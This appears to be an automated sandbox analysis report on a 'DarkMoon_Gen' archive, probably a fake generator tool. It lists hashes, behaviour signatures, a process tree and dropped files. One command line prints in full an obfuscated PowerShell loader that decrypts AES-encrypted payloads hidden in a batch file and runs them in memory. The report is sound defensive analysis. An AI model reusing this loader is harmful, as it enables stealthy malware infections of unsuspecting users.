Analysis
max time kernel: 118s
max time network: 125s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 02-06-2024 15:43
Static task: static1
Behavioral task: behavioral1
  Sample: DarkMoon_Gen_1-3.zip
  Resource: win7-20240220-en
Behavioral task: behavioral2
  Sample: DarkMoon_Gen_1-3.zip
  Resource: win10v2004-20240426-en
Behavioral task: behavioral3
  Sample: DarkMoon_Gen_1-3/lib/main.exe
  Resource: win10v2004-20240508-en
Behavioral task: behavioral4
  Sample: DarkMoon_Gen_1-3/lib/uni.bat
  Resource: win7-20240220-en
Behavioral task: behavioral5
  Sample: DarkMoon_Gen_1-3/lib/uni.bat
  Resource: win10v2004-20240508-en
Behavioral task: behavioral6
  Sample: DarkMoon_Gen_1-3/starter.bat
  Resource: win7-20240221-en
Behavioral task: behavioral7
  Sample: DarkMoon_Gen_1-3/starter.bat
  Resource: win10v2004-20240226-en
General
Target: DarkMoon_Gen_1-3/starter.bat
Size: 51B
MD5: abc778ba27885c72f364ad89b1306862
SHA1: 2d4bfe8e2de4390109e8fa786ad47ec68daeaffe
SHA256: 97c5438395ba799a673564195db730de8d9742a7a141566fa7c9075c46e3a039
SHA512: 65a9bcdb3493526dd0b340aacabd30cd2e577a03cac920341e7be041e8de133ced0ab45c14a2509fbbd6f2451ac3ef1f5d520328d44f06aa4af6bfb122991f8f
Malware Config
Signatures
Executes dropped EXE (1 IoCs)
  Processes (pid, process): 1656 uni.bat.exe
Loads dropped DLL (1 IoCs)
  Processes (pid, process): 1888 cmd.exe
Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes (description, ioc, process):
    Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" main.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 1 IoCs)
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Delays execution with timeout.exe (13 IoCs)
  Processes (pid, process): 2568 timeout.exe, 1488 timeout.exe, 580 timeout.exe, 2028 timeout.exe, 1644 timeout.exe, 2420 timeout.exe, 2844 timeout.exe, 2180 timeout.exe, 1636 timeout.exe, 3012 timeout.exe, 2812 timeout.exe, 2924 timeout.exe, 1692 timeout.exe
Runs ping.exe (1 TTPs, 17 IoCs)
  Processes (pid, process): 2492 PING.EXE, 2428 PING.EXE, 2204 PING.EXE, 1772 PING.EXE, 2636 PING.EXE, 2516 PING.EXE, 2456 PING.EXE, 2356 PING.EXE, 328 PING.EXE, 2224 PING.EXE, 3028 PING.EXE, 2676 PING.EXE, 2532 PING.EXE, 2520 PING.EXE, 692 PING.EXE, 2760 PING.EXE, 2576 PING.EXE
Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes (pid, process): 1656 uni.bat.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description, pid, process): Token: SeDebugPrivilege 1656 uni.bat.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source pid and process wrote to memory of target pid and process; number of identical entries in the report):
    2240 cmd.exe  -> 1888 cmd.exe       (3 entries)
    2240 cmd.exe  -> 1756 main.exe      (3 entries)
    1756 main.exe -> 2252 cmd.exe       (3 entries)
    2252 cmd.exe  -> 2916 chcp.com      (3 entries)
    2252 cmd.exe  -> 2924 timeout.exe   (3 entries)
    2252 cmd.exe  -> 2636 PING.EXE      (3 entries)
    2252 cmd.exe  -> 2676 PING.EXE      (3 entries)
    2252 cmd.exe  -> 2760 PING.EXE      (3 entries)
    2252 cmd.exe  -> 2532 PING.EXE      (3 entries)
    2252 cmd.exe  -> 2516 PING.EXE      (3 entries)
    2252 cmd.exe  -> 2456 PING.EXE      (3 entries)
    2252 cmd.exe  -> 2492 PING.EXE      (3 entries)
    2252 cmd.exe  -> 2520 PING.EXE      (3 entries)
    2252 cmd.exe  -> 2356 PING.EXE      (3 entries)
    2252 cmd.exe  -> 2420 timeout.exe   (3 entries)
    2252 cmd.exe  -> 2428 PING.EXE      (3 entries)
    2252 cmd.exe  -> 2844 timeout.exe   (3 entries)
    2252 cmd.exe  -> 2204 PING.EXE      (3 entries)
    2252 cmd.exe  -> 2028 timeout.exe   (3 entries)
    2252 cmd.exe  -> 328 PING.EXE       (3 entries)
    1888 cmd.exe  -> 1656 uni.bat.exe   (3 entries)
    2252 cmd.exe  -> 2568 timeout.exe   (1 entry)
Processes
C:\Windows\system32\cmd.exe (level 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\starter.bat"
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe (level 2)
    Command line: C:\Windows\system32\cmd.exe /K uni.bat
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe (level 3)
      Command line: "uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\main.exe (level 2)
    Command line: main.exe
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (level 3)
      Command line: cmd /c "Dark Moon gen.bat"
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\chcp.com (level 4)
        Command line: chcp 65001
      C:\Windows\system32\timeout.exe (level 4)
        Command line: timeout 2
        - Delays execution with timeout.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping localhost -n 1
        - Runs ping.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping localhost -n 1
        - Runs ping.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping localhost -n 1
        - Runs ping.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping localhost -n 1
        - Runs ping.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping localhost -n 1
        - Runs ping.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping localhost -n 1
        - Runs ping.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping localhost -n 1
        - Runs ping.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping localhost -n 1
        - Runs ping.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping discord.com
        - Runs ping.exe
      C:\Windows\system32\timeout.exe (level 4)
        Command line: timeout 0
        - Delays execution with timeout.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping www.paysafecard.com
        - Runs ping.exe
      C:\Windows\system32\timeout.exe (level 4)
        Command line: timeout 0
        - Delays execution with timeout.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping www.amazon.com
        - Runs ping.exe
      C:\Windows\system32\timeout.exe (level 4)
        Command line: timeout 0
        - Delays execution with timeout.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping play.google.com
        - Runs ping.exe
      C:\Windows\system32\timeout.exe (level 4)
        Command line: timeout 0
        - Delays execution with timeout.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping store.steampowered.com
        - Runs ping.exe
      C:\Windows\system32\timeout.exe (level 4)
        Command line: timeout 0
        - Delays execution with timeout.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping netflix.com
        - Runs ping.exe
      C:\Windows\system32\timeout.exe (level 4)
        Command line: timeout 0
        - Delays execution with timeout.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping www.spotify.com
        - Runs ping.exe
      C:\Windows\system32\timeout.exe (level 4)
        Command line: timeout 0
        - Delays execution with timeout.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping www.xbox.com
        - Runs ping.exe
      C:\Windows\system32\timeout.exe (level 4)
        Command line: timeout 0
        - Delays execution with timeout.exe
      C:\Windows\system32\timeout.exe (level 4)
        Command line: timeout 1
        - Delays execution with timeout.exe
      C:\Windows\system32\timeout.exe (level 4)
        Command line: timeout 2
        - Delays execution with timeout.exe
      C:\Windows\system32\timeout.exe (level 4)
        Command line: timeout 2
        - Delays execution with timeout.exe
      C:\Windows\system32\PING.EXE (level 4)
        Command line: ping www.google.com
        - Runs ping.exe
      C:\Windows\system32\timeout.exe (level 4)
        Command line: timeout 2
        - Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dark Moon gen.bat
  Filesize: 35KB
  MD5: c153581143e0b72cecae38a393991a4b
  SHA1: da43d03b19765594ff124415a060551343823a39
  SHA256: 2fa64c968a0fe02d626a225ecc2e1e4a5185f73d70a0557f32f2bbea76361005
  SHA512: 8c9807f4a3044f49d99e5b1c2a20d112eba61570fa0e725777a3bd84d6a0e7df1c604579863e27c6d0617c2c84fa4ae8c3b7525e37f7e7ee9c6ef26b6c9db40f
memory/1656-8-0x000000001B1A0000-0x000000001B482000-memory.dmp
  Filesize: 2.9MB
memory/1656-9-0x0000000001D40000-0x0000000001D48000-memory.dmp
  Filesize: 32KB